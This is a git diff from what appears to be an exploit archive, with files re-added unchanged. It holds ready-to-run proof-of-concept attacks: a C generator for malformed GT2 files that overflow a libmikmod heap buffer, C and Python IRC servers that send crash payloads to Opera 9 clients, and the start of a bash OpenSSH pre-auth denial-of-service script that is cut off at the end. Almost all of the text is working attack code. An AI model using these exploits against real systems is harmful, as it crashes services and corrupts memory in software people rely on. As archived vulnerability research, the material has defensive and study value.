0xff, fd); - fputc((num >> 8) & 0xff, fd); -} - - - -void fwi32(FILE *fd, int num) { - fputc((num ) & 0xff, fd); - fputc((num >> 8) & 0xff, fd); - fputc((num >> 16) & 0xff, fd); - fputc((num >> 24) & 0xff, fd); -} - - - -void fwstr(FILE *fd, uint8_t *str) { - fputs(str, fd); -} - - - -void fwmem(FILE *fd, uint8_t *data, int size) { - fwrite(data, size, 1, fd); -} - - - -void std_err(void) { - perror("\nError"); - exit(1); -} - -// milw0rm.com [2006-07-25] +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include +#include + + + +#define VER "0.1" + + + +#define cpy(x,y) strncpy(x, y, sizeof(x)); +void fwi08(FILE *fd, int num); +void fwi16(FILE *fd, int num); +void fwi32(FILE *fd, int num); +void fwstr(FILE *fd, uint8_t *str); +void fwmem(FILE *fd, uint8_t *data, int size); +void std_err(void); + + + +#pragma pack(1) + +typedef struct { + uint8_t gt2[3]; + uint8_t version; + uint32_t chunk_size; + uint8_t module[32]; + uint8_t comments[160]; + uint8_t date_day; + uint8_t date_month; + uint16_t date_year; + uint8_t tracker[24]; + uint16_t speed; + uint16_t tempo; + uint16_t volume; + uint16_t voices; + /* voices * 2 */ +} gt2_t; + +#pragma pack() + + + +int main(int argc, char *argv[]) { + FILE *fd; + gt2_t gt2; + int i; + char *fname; + + setbuf(stdout, NULL); + + fputs("\n" + "libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s \n" + "\n", argv[0]); + exit(1); + } + + fname = argv[1]; + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + + gt2.gt2[0] = 'G'; + gt2.gt2[1] = 'T'; + gt2.gt2[2] = '2'; + gt2.version = 4; + gt2.chunk_size = 0; // unused + cpy(gt2.module, "module_name"); + cpy(gt2.comments, "author"); + gt2.date_day = 1; + gt2.date_month = 1; + gt2.date_year = 2006; + cpy(gt2.tracker, "tracker"); + gt2.speed = 6; + gt2.tempo = 300; + gt2.volume = 0; + gt2.voices = 0; + + printf("- write GT2 header\n"); + fwrite(>2, sizeof(gt2), 1, fd); + for(i = 0; i < gt2.voices; i++) fwi16(fd, 0); + + printf("- build the XCOM header for exploiting the heap overflow\n"); + fwmem(fd, "XCOM", 4); + fwi32(fd, 0); // unused + fwi32(fd, 0xffffffff); // bug here, 0xffffffff + 1 = 0 + fwstr(fd, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"); + + fclose(fd); + printf("- finished\n"); + return(0); +} + + + +void fwi08(FILE *fd, int num) { + fputc((num ) & 0xff, fd); +} + + + +void fwi16(FILE *fd, int num) { + fputc((num ) & 0xff, fd); + fputc((num >> 8) & 0xff, fd); +} + + + +void fwi32(FILE *fd, int num) { + fputc((num ) & 0xff, fd); + fputc((num >> 8) & 0xff, fd); + fputc((num >> 16) & 0xff, fd); + fputc((num >> 24) & 0xff, fd); +} + + + +void fwstr(FILE *fd, uint8_t *str) { + fputs(str, fd); +} + + + +void fwmem(FILE *fd, uint8_t *data, int size) { + fwrite(data, size, 1, fd); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + +// milw0rm.com [2006-07-25] diff --git a/platforms/multiple/dos/2179.c b/platforms/multiple/dos/2179.c index 50990c31d..f9d39680c 100755 --- a/platforms/multiple/dos/2179.c +++ b/platforms/multiple/dos/2179.c @@ -1,107 +1,107 @@ -/* - * Opera 9 IRC client DOS exploit - * by Preddy and NNP - * - * http://www.smashthestack.org - * http://silenthack.co.uk - * http://www.team-rootshell.com - * - * 12 August 2006 - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define MYPORT 6667 - -#define BACKLOG 10 - -// : KICK\r\n - -char die[] = { - 0x3a, 0x20, 0x4b, 0x49, 0x43, 0x4b, 0x0d, 0x0a, 0x00 }; - -void sigchld_handler(int s) -{ - while(waitpid(-1, NULL, WNOHANG) > 0); -} - -int main(void) -{ - int sockfd, new_fd; - struct sockaddr_in my_addr; - struct sockaddr_in their_addr; - socklen_t sin_size; - struct sigaction sa; - int yes=1; - - if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { - perror("socket"); - exit(1); - } - - if (setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1) { - perror("setsockopt"); - exit(1); - } - - my_addr.sin_family = AF_INET; - my_addr.sin_port = htons(MYPORT); - my_addr.sin_addr.s_addr = INADDR_ANY; - memset(&(my_addr.sin_zero), '\0', 8); - - if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) - == -1) { - perror("bind"); - exit(1); - } - - if (listen(sockfd, BACKLOG) == -1) { - perror("listen"); - exit(1); - } - - sa.sa_handler = sigchld_handler; // reap all dead processes - sigemptyset(&sa.sa_mask); - sa.sa_flags = SA_RESTART; - if (sigaction(SIGCHLD, &sa, NULL) == -1) { - perror("sigaction"); - exit(1); - } - - while(1) { // main accept() loop - sin_size = sizeof(struct sockaddr_in); - if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, - &sin_size)) == -1) { - perror("accept"); - continue; - } - printf("server: got connection from %s\n", - inet_ntoa(their_addr.sin_addr)); - if (!fork()) { // this is the child process - int sentBytes = 0; - close(sockfd); // child doesn't need the listener - if ((sentBytes = send(new_fd, die, sizeof(die), 0)) == -1) - perror("send"); - printf("sent %d bytes\n", sentBytes); - sentBytes = 0; - close(new_fd); - exit(0); - } - close(new_fd); // parent doesn't need this - } - - return 0; -} - -// milw0rm.com [2006-08-13] +/* + * Opera 9 IRC client DOS exploit + * by Preddy and NNP + * + * http://www.smashthestack.org + * http://silenthack.co.uk + * http://www.team-rootshell.com + * + * 12 August 2006 + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MYPORT 6667 + +#define BACKLOG 10 + +// : KICK\r\n + +char die[] = { + 0x3a, 0x20, 0x4b, 0x49, 0x43, 0x4b, 0x0d, 0x0a, 0x00 }; + +void sigchld_handler(int s) +{ + while(waitpid(-1, NULL, WNOHANG) > 0); +} + +int main(void) +{ + int sockfd, new_fd; + struct sockaddr_in my_addr; + struct sockaddr_in their_addr; + socklen_t sin_size; + struct sigaction sa; + int yes=1; + + if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { + perror("socket"); + exit(1); + } + + if (setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1) { + perror("setsockopt"); + exit(1); + } + + my_addr.sin_family = AF_INET; + my_addr.sin_port = htons(MYPORT); + my_addr.sin_addr.s_addr = INADDR_ANY; + memset(&(my_addr.sin_zero), '\0', 8); + + if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) + == -1) { + perror("bind"); + exit(1); + } + + if (listen(sockfd, BACKLOG) == -1) { + perror("listen"); + exit(1); + } + + sa.sa_handler = sigchld_handler; // reap all dead processes + sigemptyset(&sa.sa_mask); + sa.sa_flags = SA_RESTART; + if (sigaction(SIGCHLD, &sa, NULL) == -1) { + perror("sigaction"); + exit(1); + } + + while(1) { // main accept() loop + sin_size = sizeof(struct sockaddr_in); + if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, + &sin_size)) == -1) { + perror("accept"); + continue; + } + printf("server: got connection from %s\n", + inet_ntoa(their_addr.sin_addr)); + if (!fork()) { // this is the child process + int sentBytes = 0; + close(sockfd); // child doesn't need the listener + if ((sentBytes = send(new_fd, die, sizeof(die), 0)) == -1) + perror("send"); + printf("sent %d bytes\n", sentBytes); + sentBytes = 0; + close(new_fd); + exit(0); + } + close(new_fd); // parent doesn't need this + } + + return 0; +} + +// milw0rm.com [2006-08-13] diff --git a/platforms/multiple/dos/2180.py b/platforms/multiple/dos/2180.py index a132160d7..0954dda7a 100755 --- a/platforms/multiple/dos/2180.py +++ b/platforms/multiple/dos/2180.py @@ -1,153 +1,153 @@ -#!/usr/bin/python - -# -# Opera 9 IRC client DOS -# NNP + Preddy -# http://silenthack.co.uk -# http://smashthestack.org -# http://www.team-rootshell.com -# - -import socket - -die = '''\x3a\x61\x61\x61\x20\x33\x35\x33 -\x20\x15\xf8\x9c\x71\x0a\x3a\x64 -\xff\x26\xf8\x9b\x33\xd2\x9b\x34 -\xa4\xa7\x7d\x62\xd1\xa8\x2f\xb8 -\x9a\x85\x63\x3e\x1e\x9e\xe6\xa6 -\xb3\xde\x42\x25\xe8\x7c\x89\xe7 -\xa2\x81\x83\xd6\x53\x1e\x0a\xf7 -\xc5\x87\x59\x97\x2f\x88\x4f\xc9 -\x0d\xb2\x07\x2b\x50\xed\xd1\x03 -\xcb\x13\x28\xb3\x90\xb1\x9b\x32 -\x32\x1e\x08\x85\x3c\x13\x7c\x02 -\x9a\xd6\x99\xca\x5e\xe8\x93\x6c -\x9a\x9b\x97\xea\x88\x69\xed\x54 -\x7c\x16\x07\x0c\xc7\xa2\x3f\xfa -\xc0\x47\x7f\xfd\x5a\xfc\xff\xf5 -\xd2\x98\xbf\x30\x80\x52\x9c\x1a -\xed\x34\x04\x76\x9d\xf1\xca\x19 -\x07\xd1\x26\xcf\x74\x65\xc9\x34 -\xac\x48\x31\x07\x44\x30\xfc\x16 -\xc8\xbb\x47\x48\x0d\xe3\x62\xfb -\x17\x66\x71\xb4\x58\x3b\xce\x5f -\x0c\xf4\x2e\x80\x59\xf7\xb5\x05 -\x40\xe6\x0c\x84\x17\x08\x9b\xdf -\xc3\xe2\x28\xd1\xc5\x8a\xcc\xdd -\xf1\x3d\x91\x49\x78\x5f\xa8\x84 -\x53\xd7\x05\xac\xce\xba\xb2\x0e -\xa0\xbe\x93\xb7\xc7\x2e\x97\x8a -\x10\xbf\x5b\xd5\x49\x27\xb2\x3a -\x64\x44\x83\xdc\xa3\x2c\x61\xf7 -\x03\x66\xa3\xd1\x20\x55\xe0\xc0 -\x14\x73\x78\xdb\xa1\x0f\x65\xb1 -\xce\xc1\x86\x17\xe8\x39\x52\x4d -\x7d\xd5\x29\x20\x01\x8a\x17\x04 -\xf0\xbb\xd6\x10\x10\xb6\xd1\x24 -\x29\x49\xff\xca\x58\x65\x7b\x26 -\x26\x01\x3d\x0e\x3a\x8f\x5b\xb7 -\x65\x85\xd8\x66\x0f\xef\x6b\x00 -\xaa\x41\x10\xbb\xf7\xe1\xdf\x20 -\x2a\xdf\xea\x82\x44\x65\xa8\x6a -\x66\xe6\x78\xa1\x75\xd4\x58\xda -\x59\x30\x41\x68\x20\xac\x68\xca -\xed\x79\x85\xe4\x5a\x65\x04\x85 -\x44\xee\x07\x88\x53\xb0\xf2\xb9 -\x96\x6a\x5a\x0b\x3e\xb3\xe6\x97 -\xe3\x27\x00\x03\xd3\x68\xce\xc0 -\xe1\x53\xa4\x3c\xb8\xa8\xc1\xfc -\x96\xc8\x84\xe9\x78\x76\xa2\x0e -\xe1\xfd\x1a\x1f\xb0\x00\xb7\x93 -\x27\xb7\x97\xfa\x1f\x65\xba\x01 -\xb8\x5e\x3d\x71\x06\xfe\x6d\x9c -\xc6\xf2\x85\x3f\x68\x27\x4d\x49 -\x24\x67\x69\xd4\x67\x20\x68\x8e -\xd7\xff\x88\xf6\x64\x42\xf7\x1c -\xa0\x34\x8d\xa6\x32\xfb\x42\xf9 -\xed\xc7\x38\x55\xef\x85\x9f\x13 -\xed\x08\xe8\x54\x28\x50\xe3\xff -\x4f\x6b\xf5\xb3\xae\xed\xcf\x4e -\x21\x5d\xf5\x54\x58\x37\x4d\x45 -\xff\x85\x9a\xee\x0a\x39\x01\xf7 -\x41\xe9\x4c\x69\x39\x2f\x68\x88 -\x9a\x5e\x3b\x48\x4b\x0b\x97\x6c -\x68\x8c\xc0\xc0\xc3\x0d\x05\xc2 -\x92\x9f\xb0\x9d\xd9\xb2\x94\x1a -\x9b\xe0\x84\xd5\x0f\xec\x5d\xaa -\x4a\x99\xf2\x95\xa4\x89\x02\x0c -\x15\xc2\xcc\xd9\xd0\xd1\x9b\x62 -\x70\x4c\xff\x49\xfe\x94\x64\x99 -\x74\xe8\x6e\x84\xd4\xcc\x2e\x1f -\x65\x20\xb4\x09\xaa\xb6\x15\xbf -\x79\xe1\x98\x49\xb2\x34\xab\x22 -\x80\xab\x6c\x7e\x3f\xd0\x17\xb3 -\xb8\x86\x37\x8c\x52\x65\xab\xb7 -\x86\x60\xc0\x30\x16\xd5\xef\x8f -\xb6\x88\xd8\x68\xbc\x84\x8a\x3c -\x2f\xf6\xba\x6e\xc6\xd1\x21\x7e -\x57\x59\x0b\xa9\xbe\xb6\x60\x44 -\x16\x20\x74\x2d\xf5\x64\xbc\xab -\xec\x95\x13\xa8\x19\x9e\xe4\x48 -\x94\x9e\xb6\x5b\x6f\xd7\xd9\xc7 -\x30\xe4\x70\xef\x9b\xd1\x33\xb1 -\xf1\xa8\xde\xe7\x0c\x9b\x92\xf8 -\x30\xa6\xa0\x49\x44\x84\x91\xd8 -\x22\x47\x33\x91\x1e\x0d\x58\x4f -\xf1\xc9\x3e\x8c\x9a\x71\x3e\x8b -\x19\x1c\x72\x25\xb7\x05\x1d\xe7 -\xab\xbd\x30\xef\x41\xc1\xc7\x63 -\x08\xfb\xf5\x27\x08\x4d\x76\xf9 -\x16\xb4\x86\xb0\x25\xc4\x3c\x3f -\xe0\xae\x64\x98\xb3\x82\x7f\x5e -\x3f\xb0\x4d\x81\x71\x15\xe4\x7a -\x10\xd9\xa1\x18\x27\x17\x11\x3d -\xcb\x97\xee\xf0\x5b\x2a\x2f\x3c -\xd8\x94\xd4\x8c\x16\x53\xea\x55 -\x03\x38\xd6\x75\x4d\xbb\xef\x5d -\x94\x90\x75\xbb\xa7\x86\xf9\x72 -\x1e\xe7\x62\x79\x11\x92\xb5\xe9 -\x26\x89\x75\x3c\xdd\x60\x91\xe0 -\x98\x68\x55\xe5\x23\x44\x42\xb7 -\xd4\xb7\x73\x7b\x3d\x6c\xed\x5b -\x53\x50\xd5\x64\xe2\x8a\x4d\x08 -\x14\xc3\x44\xf1\x23\xd5\xd1\xbb -\x3d\x27\xa0\x60\x6b\xe2\x18\x40 -\x99\x8b\xbb\xd6\xf7\xa9\x32\x4a -\xf9\x07\xae\xdb\x91\xfb\xe3\xa5 -\xbe\x27\x96\xe1\xfc\x68\x9c\x3a -\x8f\x3c\x9a\xfa\x1e\xb2\x3a\xb7 -\x3d\xf6\x8e\x34\x9f\xc0\x7e\x98 -\xc7\x2c\x73\x58\x28\x56\xfe\xe6 -\x7d\x94\xc8\x79\xfc\x64\xb3\x8b -\xa1\x4e\x86\xbf\x00\xc0\x77\x3e -\xb6\x05\x72\x55\xc5\xf1\xed\x8c -\x1d\x60\xe4\x45\xb6\xe2\x2c\x33 -\x77\xf4\xad\x73\x58\x60\xff\xf9 -\xae\x85\xb9\xaf\x45\x30\xed\xfc -\x35\x5f\x51\xfa\x50\x3f\x86\x6e -\x9f\x6a\xb3\x56\x4d\xdf\x89\xc4 -\xd3\x36\x37\x2c\x97\x36\x25\x45 -\xbb\xde\xf4\x01\x0e\xe1\xfd\x43 -\x41\x4e\x3d\x91\x8d\xc3\xff\x2d -\x2e\xb3\x83\x7b\x92\x0c\x3f\x66 -\x43\x76\x92\xda\xad\xb7\x1f\x68 -\x96\x14\x69\xa4\xf5\x66\xe8\x36 -\xb5\x25\xc8\x42\xe9\xc7\x6f\x17 -\x7a\xf2\x92\x0d\xff\xd1\x73\x42 -\x47\x05\x1c\xf4\xbc\x3b\x5d\x52 -\x4f\xc6\xf7\x45\x2d\xdf\x7b\xe2 -\x04\x43\x24\xed\x0b\x94\x04\x85 -\x86\x96\x92\x85\x67\x05\xc7\xaf -''' - -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.bind(("localhost", 6667)) -s.listen(5) - -while 1: - (clientsock, address) = s.accept() - sent = clientsock.send(die) - print "Sent %d bytes" % sent - sent = 0 - -# milw0rm.com [2006-08-13] +#!/usr/bin/python + +# +# Opera 9 IRC client DOS +# NNP + Preddy +# http://silenthack.co.uk +# http://smashthestack.org +# http://www.team-rootshell.com +# + +import socket + +die = '''\x3a\x61\x61\x61\x20\x33\x35\x33 +\x20\x15\xf8\x9c\x71\x0a\x3a\x64 +\xff\x26\xf8\x9b\x33\xd2\x9b\x34 +\xa4\xa7\x7d\x62\xd1\xa8\x2f\xb8 +\x9a\x85\x63\x3e\x1e\x9e\xe6\xa6 +\xb3\xde\x42\x25\xe8\x7c\x89\xe7 +\xa2\x81\x83\xd6\x53\x1e\x0a\xf7 +\xc5\x87\x59\x97\x2f\x88\x4f\xc9 +\x0d\xb2\x07\x2b\x50\xed\xd1\x03 +\xcb\x13\x28\xb3\x90\xb1\x9b\x32 +\x32\x1e\x08\x85\x3c\x13\x7c\x02 +\x9a\xd6\x99\xca\x5e\xe8\x93\x6c +\x9a\x9b\x97\xea\x88\x69\xed\x54 +\x7c\x16\x07\x0c\xc7\xa2\x3f\xfa +\xc0\x47\x7f\xfd\x5a\xfc\xff\xf5 +\xd2\x98\xbf\x30\x80\x52\x9c\x1a +\xed\x34\x04\x76\x9d\xf1\xca\x19 +\x07\xd1\x26\xcf\x74\x65\xc9\x34 +\xac\x48\x31\x07\x44\x30\xfc\x16 +\xc8\xbb\x47\x48\x0d\xe3\x62\xfb +\x17\x66\x71\xb4\x58\x3b\xce\x5f +\x0c\xf4\x2e\x80\x59\xf7\xb5\x05 +\x40\xe6\x0c\x84\x17\x08\x9b\xdf +\xc3\xe2\x28\xd1\xc5\x8a\xcc\xdd +\xf1\x3d\x91\x49\x78\x5f\xa8\x84 +\x53\xd7\x05\xac\xce\xba\xb2\x0e +\xa0\xbe\x93\xb7\xc7\x2e\x97\x8a +\x10\xbf\x5b\xd5\x49\x27\xb2\x3a +\x64\x44\x83\xdc\xa3\x2c\x61\xf7 +\x03\x66\xa3\xd1\x20\x55\xe0\xc0 +\x14\x73\x78\xdb\xa1\x0f\x65\xb1 +\xce\xc1\x86\x17\xe8\x39\x52\x4d +\x7d\xd5\x29\x20\x01\x8a\x17\x04 +\xf0\xbb\xd6\x10\x10\xb6\xd1\x24 +\x29\x49\xff\xca\x58\x65\x7b\x26 +\x26\x01\x3d\x0e\x3a\x8f\x5b\xb7 +\x65\x85\xd8\x66\x0f\xef\x6b\x00 +\xaa\x41\x10\xbb\xf7\xe1\xdf\x20 +\x2a\xdf\xea\x82\x44\x65\xa8\x6a +\x66\xe6\x78\xa1\x75\xd4\x58\xda +\x59\x30\x41\x68\x20\xac\x68\xca +\xed\x79\x85\xe4\x5a\x65\x04\x85 +\x44\xee\x07\x88\x53\xb0\xf2\xb9 +\x96\x6a\x5a\x0b\x3e\xb3\xe6\x97 +\xe3\x27\x00\x03\xd3\x68\xce\xc0 +\xe1\x53\xa4\x3c\xb8\xa8\xc1\xfc +\x96\xc8\x84\xe9\x78\x76\xa2\x0e +\xe1\xfd\x1a\x1f\xb0\x00\xb7\x93 +\x27\xb7\x97\xfa\x1f\x65\xba\x01 +\xb8\x5e\x3d\x71\x06\xfe\x6d\x9c +\xc6\xf2\x85\x3f\x68\x27\x4d\x49 +\x24\x67\x69\xd4\x67\x20\x68\x8e +\xd7\xff\x88\xf6\x64\x42\xf7\x1c +\xa0\x34\x8d\xa6\x32\xfb\x42\xf9 +\xed\xc7\x38\x55\xef\x85\x9f\x13 +\xed\x08\xe8\x54\x28\x50\xe3\xff +\x4f\x6b\xf5\xb3\xae\xed\xcf\x4e +\x21\x5d\xf5\x54\x58\x37\x4d\x45 +\xff\x85\x9a\xee\x0a\x39\x01\xf7 +\x41\xe9\x4c\x69\x39\x2f\x68\x88 +\x9a\x5e\x3b\x48\x4b\x0b\x97\x6c +\x68\x8c\xc0\xc0\xc3\x0d\x05\xc2 +\x92\x9f\xb0\x9d\xd9\xb2\x94\x1a +\x9b\xe0\x84\xd5\x0f\xec\x5d\xaa +\x4a\x99\xf2\x95\xa4\x89\x02\x0c +\x15\xc2\xcc\xd9\xd0\xd1\x9b\x62 +\x70\x4c\xff\x49\xfe\x94\x64\x99 +\x74\xe8\x6e\x84\xd4\xcc\x2e\x1f +\x65\x20\xb4\x09\xaa\xb6\x15\xbf +\x79\xe1\x98\x49\xb2\x34\xab\x22 +\x80\xab\x6c\x7e\x3f\xd0\x17\xb3 +\xb8\x86\x37\x8c\x52\x65\xab\xb7 +\x86\x60\xc0\x30\x16\xd5\xef\x8f +\xb6\x88\xd8\x68\xbc\x84\x8a\x3c +\x2f\xf6\xba\x6e\xc6\xd1\x21\x7e +\x57\x59\x0b\xa9\xbe\xb6\x60\x44 +\x16\x20\x74\x2d\xf5\x64\xbc\xab +\xec\x95\x13\xa8\x19\x9e\xe4\x48 +\x94\x9e\xb6\x5b\x6f\xd7\xd9\xc7 +\x30\xe4\x70\xef\x9b\xd1\x33\xb1 +\xf1\xa8\xde\xe7\x0c\x9b\x92\xf8 +\x30\xa6\xa0\x49\x44\x84\x91\xd8 +\x22\x47\x33\x91\x1e\x0d\x58\x4f +\xf1\xc9\x3e\x8c\x9a\x71\x3e\x8b +\x19\x1c\x72\x25\xb7\x05\x1d\xe7 +\xab\xbd\x30\xef\x41\xc1\xc7\x63 +\x08\xfb\xf5\x27\x08\x4d\x76\xf9 +\x16\xb4\x86\xb0\x25\xc4\x3c\x3f +\xe0\xae\x64\x98\xb3\x82\x7f\x5e +\x3f\xb0\x4d\x81\x71\x15\xe4\x7a +\x10\xd9\xa1\x18\x27\x17\x11\x3d +\xcb\x97\xee\xf0\x5b\x2a\x2f\x3c +\xd8\x94\xd4\x8c\x16\x53\xea\x55 +\x03\x38\xd6\x75\x4d\xbb\xef\x5d +\x94\x90\x75\xbb\xa7\x86\xf9\x72 +\x1e\xe7\x62\x79\x11\x92\xb5\xe9 +\x26\x89\x75\x3c\xdd\x60\x91\xe0 +\x98\x68\x55\xe5\x23\x44\x42\xb7 +\xd4\xb7\x73\x7b\x3d\x6c\xed\x5b +\x53\x50\xd5\x64\xe2\x8a\x4d\x08 +\x14\xc3\x44\xf1\x23\xd5\xd1\xbb +\x3d\x27\xa0\x60\x6b\xe2\x18\x40 +\x99\x8b\xbb\xd6\xf7\xa9\x32\x4a +\xf9\x07\xae\xdb\x91\xfb\xe3\xa5 +\xbe\x27\x96\xe1\xfc\x68\x9c\x3a +\x8f\x3c\x9a\xfa\x1e\xb2\x3a\xb7 +\x3d\xf6\x8e\x34\x9f\xc0\x7e\x98 +\xc7\x2c\x73\x58\x28\x56\xfe\xe6 +\x7d\x94\xc8\x79\xfc\x64\xb3\x8b +\xa1\x4e\x86\xbf\x00\xc0\x77\x3e +\xb6\x05\x72\x55\xc5\xf1\xed\x8c +\x1d\x60\xe4\x45\xb6\xe2\x2c\x33 +\x77\xf4\xad\x73\x58\x60\xff\xf9 +\xae\x85\xb9\xaf\x45\x30\xed\xfc +\x35\x5f\x51\xfa\x50\x3f\x86\x6e +\x9f\x6a\xb3\x56\x4d\xdf\x89\xc4 +\xd3\x36\x37\x2c\x97\x36\x25\x45 +\xbb\xde\xf4\x01\x0e\xe1\xfd\x43 +\x41\x4e\x3d\x91\x8d\xc3\xff\x2d +\x2e\xb3\x83\x7b\x92\x0c\x3f\x66 +\x43\x76\x92\xda\xad\xb7\x1f\x68 +\x96\x14\x69\xa4\xf5\x66\xe8\x36 +\xb5\x25\xc8\x42\xe9\xc7\x6f\x17 +\x7a\xf2\x92\x0d\xff\xd1\x73\x42 +\x47\x05\x1c\xf4\xbc\x3b\x5d\x52 +\x4f\xc6\xf7\x45\x2d\xdf\x7b\xe2 +\x04\x43\x24\xed\x0b\x94\x04\x85 +\x86\x96\x92\x85\x67\x05\xc7\xaf +''' + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.bind(("localhost", 6667)) +s.listen(5) + +while 1: + (clientsock, address) = s.accept() + sent = clientsock.send(die) + print "Sent %d bytes" % sent + sent = 0 + +# milw0rm.com [2006-08-13] diff --git a/platforms/multiple/dos/2303.html b/platforms/multiple/dos/2303.html index 53338ca3a..e9d8877c1 100755 --- a/platforms/multiple/dos/2303.html +++ b/platforms/multiple/dos/2303.html @@ -1,34 +1,34 @@ - - -Click Me For A Test Crash - - - -# milw0rm.com [2006-09-05] + + +Click Me For A Test Crash + + + +# milw0rm.com [2006-09-05] diff --git a/platforms/multiple/dos/2444.sh b/platforms/multiple/dos/2444.sh index 280681a37..7d6cc6393 100755 --- a/platforms/multiple/dos/2444.sh +++ b/platforms/multiple/dos/2444.sh @@ -1,122 +1,122 @@ -#!/bin/bash -# -# OpenSSH CRC compensation attack detection DoS PoC. -# Tavis Ormandy -# -# Yes, I really did implement crc-32 in bash. -# -# usage: script - -# victim hostname -hostname=${1:-localhost} -port=${2:-22} - -# where the fifo is created to communicate with netcat -fifo=/tmp/nc.$$ - -# make the fifos -mkfifo ${fifo}.in -mkfifo ${fifo}.out - -# pre-calculated crc32 for packet header -declare -i crc=0xb2240279 - -# crc lookup table -declare -a crc32tab=( 0x00000000 0x77073096 0xee0e612c 0x990951ba 0x076dc419 - 0x706af48f 0xe963a535 0x9e6495a3 0x0edb8832 0x79dcb8a4 0xe0d5e91e 0x97d2d988 - 0x09b64c2b 0x7eb17cbd 0xe7b82d07 0x90bf1d91 0x1db71064 0x6ab020f2 0xf3b97148 - 0x84be41de 0x1adad47d 0x6ddde4eb 0xf4d4b551 0x83d385c7 0x136c9856 0x646ba8c0 - 0xfd62f97a 0x8a65c9ec 0x14015c4f 0x63066cd9 0xfa0f3d63 0x8d080df5 0x3b6e20c8 - 0x4c69105e 0xd56041e4 0xa2677172 0x3c03e4d1 0x4b04d447 0xd20d85fd 0xa50ab56b - 0x35b5a8fa 0x42b2986c 0xdbbbc9d6 0xacbcf940 0x32d86ce3 0x45df5c75 0xdcd60dcf - 0xabd13d59 0x26d930ac 0x51de003a 0xc8d75180 0xbfd06116 0x21b4f4b5 0x56b3c423 - 0xcfba9599 0xb8bda50f 0x2802b89e 0x5f058808 0xc60cd9b2 0xb10be924 0x2f6f7c87 - 0x58684c11 0xc1611dab 0xb6662d3d 0x76dc4190 0x01db7106 0x98d220bc 0xefd5102a - 0x71b18589 0x06b6b51f 0x9fbfe4a5 0xe8b8d433 0x7807c9a2 0x0f00f934 0x9609a88e - 0xe10e9818 0x7f6a0dbb 0x086d3d2d 0x91646c97 0xe6635c01 0x6b6b51f4 0x1c6c6162 - 0x856530d8 0xf262004e 0x6c0695ed 0x1b01a57b 0x8208f4c1 0xf50fc457 0x65b0d9c6 - 0x12b7e950 0x8bbeb8ea 0xfcb9887c 0x62dd1ddf 0x15da2d49 0x8cd37cf3 0xfbd44c65 - 0x4db26158 0x3ab551ce 0xa3bc0074 0xd4bb30e2 0x4adfa541 0x3dd895d7 0xa4d1c46d - 0xd3d6f4fb 0x4369e96a 0x346ed9fc 0xad678846 0xda60b8d0 0x44042d73 0x33031de5 - 0xaa0a4c5f 0xdd0d7cc9 0x5005713c 0x270241aa 0xbe0b1010 0xc90c2086 0x5768b525 - 0x206f85b3 0xb966d409 0xce61e49f 0x5edef90e 0x29d9c998 0xb0d09822 0xc7d7a8b4 - 0x59b33d17 0x2eb40d81 0xb7bd5c3b 0xc0ba6cad 0xedb88320 0x9abfb3b6 0x03b6e20c - 0x74b1d29a 0xead54739 0x9dd277af 0x04db2615 0x73dc1683 0xe3630b12 0x94643b84 - 0x0d6d6a3e 0x7a6a5aa8 0xe40ecf0b 0x9309ff9d 0x0a00ae27 0x7d079eb1 0xf00f9344 - 0x8708a3d2 0x1e01f268 0x6906c2fe 0xf762575d 0x806567cb 0x196c3671 0x6e6b06e7 - 0xfed41b76 0x89d32be0 0x10da7a5a 0x67dd4acc 0xf9b9df6f 0x8ebeeff9 0x17b7be43 - 0x60b08ed5 0xd6d6a3e8 0xa1d1937e 0x38d8c2c4 0x4fdff252 0xd1bb67f1 0xa6bc5767 - 0x3fb506dd 0x48b2364b 0xd80d2bda 0xaf0a1b4c 0x36034af6 0x41047a60 0xdf60efc3 - 0xa867df55 0x316e8eef 0x4669be79 0xcb61b38c 0xbc66831a 0x256fd2a0 0x5268e236 - 0xcc0c7795 0xbb0b4703 0x220216b9 0x5505262f 0xc5ba3bbe 0xb2bd0b28 0x2bb45a92 - 0x5cb36a04 0xc2d7ffa7 0xb5d0cf31 0x2cd99e8b 0x5bdeae1d 0x9b64c2b0 0xec63f226 - 0x756aa39c 0x026d930a 0x9c0906a9 0xeb0e363f 0x72076785 0x05005713 0x95bf4a82 - 0xe2b87a14 0x7bb12bae 0x0cb61b38 0x92d28e9b 0xe5d5be0d 0x7cdcefb7 0x0bdbdf21 - 0x86d3d2d4 0xf1d4e242 0x68ddb3f8 0x1fda836e 0x81be16cd 0xf6b9265b 0x6fb077e1 - 0x18b74777 0x88085ae6 0xff0f6a70 0x66063bca 0x11010b5c 0x8f659eff 0xf862ae69 - 0x616bffd3 0x166ccf45 0xa00ae278 0xd70dd2ee 0x4e048354 0x3903b3c2 0xa7672661 - 0xd06016f7 0x4969474d 0x3e6e77db 0xaed16a4a 0xd9d65adc 0x40df0b66 0x37d83bf0 - 0xa9bcae53 0xdebb9ec5 0x47b2cf7f 0x30b5ffe9 0xbdbdf21c 0xcabac28a 0x53b39330 - 0x24b4a3a6 0xbad03605 0xcdd70693 0x54de5729 0x23d967bf 0xb3667a2e 0xc4614ab8 - 0x5d681b02 0x2a6f2b94 0xb40bbe37 0xc30c8ea1 0x5a05df1b 0x2d02ef8d ); - -printf "[*] OpenSSH Pre-Auth DoS PoC by taviso@google.com\n" >&2 